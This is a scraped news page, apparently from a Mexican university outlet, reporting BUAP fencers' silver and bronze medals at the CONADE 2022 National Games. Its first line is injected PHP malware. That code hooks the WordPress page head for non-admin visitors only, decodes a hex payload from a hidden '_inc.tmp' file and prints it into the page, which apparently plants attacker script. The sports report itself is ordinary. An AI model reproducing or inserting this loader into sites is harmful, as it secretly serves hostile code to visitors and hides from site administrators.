if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Logra la BUAP medallas de plata y bronce este fin de semana en los Juegos Nacionales CONADE 2022 – La Opinión Universitaria La Opinión Universitaria
Menu

Logra la BUAP medallas de plata y bronce este fin de semana en los Juegos Nacionales CONADE 2022

 

  • En esgrima, en equipo se obtuvo tercer lugar, mientras que en sable, individual, segundo lugar

Los atletas de la BUAP lograron este fin de semana colgarse medallas de plata y bronce en los Juegos Nacionales CONADE 2022: Ashley Samantha Muñoz Flores ganó el segundo lugar en sable femenil, categoría individual; mientras que en equipo se sumó a las alumnas Ilse Lilian Mejía Ramírez y Sandra Verónica Aguilar López para obtener el tercer lugar en la disciplina de esgrima.

El equipo conformado por las estudiantes Ilse Mejía, de la Licenciatura en Mercadotecnia y Medios Digitales; Sandra Aguilar, de la Licenciatura en Lingüística y Literatura Hispánica; y Ashley Muñoz, de la Licenciatura en Ingeniería Química, ganó la medalla de bronce en estos juegos, en su sede de Mexicali, Baja California, luego de vencer a las representantes del estado de Jalisco.

Por su parte, Ashley Muñoz sumó a su trayectoria de éxitos deportivos la presea de plata, luego de vencer a su contrincante de Baja California.

Con estos resultados, son nueve los estudiantes de la BUAP que han sumado medallas para el estado de Puebla en esta competencia nacional.

 

  • Tweets recientes